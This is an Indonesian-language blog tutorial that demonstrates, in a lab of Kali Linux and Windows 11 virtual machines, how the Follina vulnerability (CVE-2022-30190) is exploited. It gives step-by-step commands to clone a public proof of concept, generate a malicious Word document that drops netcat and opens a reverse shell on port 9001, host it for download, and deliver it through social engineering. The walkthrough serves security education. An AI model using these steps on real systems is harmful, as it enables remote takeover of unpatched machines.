Tutorial Step By Step Bagaimana Hacker Menggunakan File Word Untuk Hacking Korbannya — CVE-2022–30190 (Follina)
“DISCLAIMER”
Hacking without permission is illegal. This blog is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing so that we can protect ourselves against the real hackers.
Pada kesempatan kali ini kita akan mencoba mengenal lebih mendalam tentang kerentanan CVE-2022–30190 (Follina). Detail penjelasan terkait kerentanan ini sudah saya ceritakan pada blog post saya sebelumnya pada link berikut:
Penjelasan Lengkap CVE-2022–30190 (Follina)
Ok, setelah kita memahami terkait dengan penjelasan kerentanan ini. Pada kesempatan ini kita akan mempraktekan bagaimana melakukan eksploitasi menggunakan kerentanan ini.
Untuk mempraktekan kerentanan ini, kita akan menggunakan virtual machine windows 11 yang dulu bisa didownload pada link berikut:
Namun, setelah saya cek ternyata pada tanggal 8 Desember 2024 link diatas sudah tidak bisa lagi download virtual machine untuk developer. Namun saya masih memiliki virtual machine yang dulu sempat pernah saya download, jadinya saya masih bisa memakai VM windows 11 untuk developer.
Untuk teman — teman yang ingin mempraktekan celah keamanan ini dan tidak memiliki VM nya silahkan bisa menghubungi saya melalui Linkedin saya pada link berikut:
Untuk kebutuhan tutorial mempraktekan kerentanan ini kita membutuhkan 2 VM sebagai berikut:
- Kali Linux (Untuk Penyerang) — Bisa didownload pada web resmi Kali Linux
- Windows 11 (Untuk Korban) — OS Build 21996.1, jika tidak memiliki VM-nya bisa hubungi saya.
Detail OS Windows 11 adalah sebagai berikut:
Dan di windows 11 ini kita perlu melakukan instalasi Microsoft Office 2019 versi 1908 (Build 11929.20708)
Setelah 2 mesin sudah kita set-up selanjutnya kita siap untuk praktek.
Pada tutorial ini kita akan menggunakan PoC Follina dari JohnHammond yang bisa diakses pada link github:
Script tersebut akan kita gunakan pada kali linux kita untuk men-generate sebuah malicious Microsoft Word document dan memuat sebuah payload dengan sebuah HTTP server. Untuk lebih jelasnya kita akan langsung praktek.
- Disini IP Windows 11 (Korban) kita adalah 192.168.1.198.
- IP Kali Linux (Penyerang) adalah 192.168.1.17
Langkah — langkah untuk men-generate malicious document adalah sebagai berikut:
Pada Kali Linux Machine
- Git Clone script msdt-follina
git clone https://github.com/JohnHammond/msdt-follina.git
2. Lalu setelah itu, masuk ke folder msdt-follina
3. Selanjutnya untuk men-generate file malicious document dan mendapatkan remote code execution (RCE), kita bisa mengetik:
python3 follina.py -r 9001Command diatas untuk mendapatkan reverse shell pada port 9001. Catatan, script ini akan mengunduh file netcat ke sistem korban dan menempatkannya di C:\Windows\Tasks.
setelah menjalankan script follina.py, akan tergenerate file follina .doc pada folder msdt-follina. Terminal yang menjalankan script follina ini jangan ditutup, karena ketika korban menjalankan file .doc nya maka penyerang akan langsung mendapatkan full akses dari device korban.
File follina.doc inilah yang akan kita kirimkan ke korban dengan teknik lain seperti social engineering. Apabila file follina.doc ini dibuka di PC korban, maka penyerang akan langsung berhasil mendapatkan reverse shell.
4. Copy file follina.doc ke folder /var/www/html agar bisa didownload oleh korban.
5. Pastikan service apache running. Jika tidak running bisa jalankan dengan perintah sudo systemctl start apache2.
6. Pada Windows 11 Korban, mari kita download file follina.doc dengan membuka browser dan mengetik IP dari penyerang 192.168.1.17/follina.doc untuk mendownload file follina.doc
File follina berhasil didownload tanpa terdeteksi oleh anti virus padahal status AV dalam kondisi running, dikarenakan mesin windows ini masih mesin windows di tahun 2022 artinya memang di tahun tersebut celah ini masih berstatus zero day belum dipatch.
7. Selanjutnya mari kita buka follina.doc yang sudah didownload pada windows 11.
Jika protected maka selanjutnya enable editing.
Dan BOOM, pop up windows MSDT. Disini penyerang sudah berhasil mendapatkan reverse shell. Mari kita cek di kali linux.
8. Tampilan terminal di kali linux yang running script follina.py akan tampil sebagai berikut:
Penyerang sudah berhasil mendapatkan full akses dengan user desktop-r0ir99h\data
Itulah bahaya dari kerentanan Follina yang bisa mendapatkan remote code execution.
Kerentanan ini masih bisa terkesploitasi jika OS dan officenya tidak diupdate.
Pada postingan selanjutnya kita akan lakukan analisis forensik untuk mengetahui apa karakteristik dari sistem yang terserang CVE-2022–30190 (Follina). Sekian, terima kasih. See you!
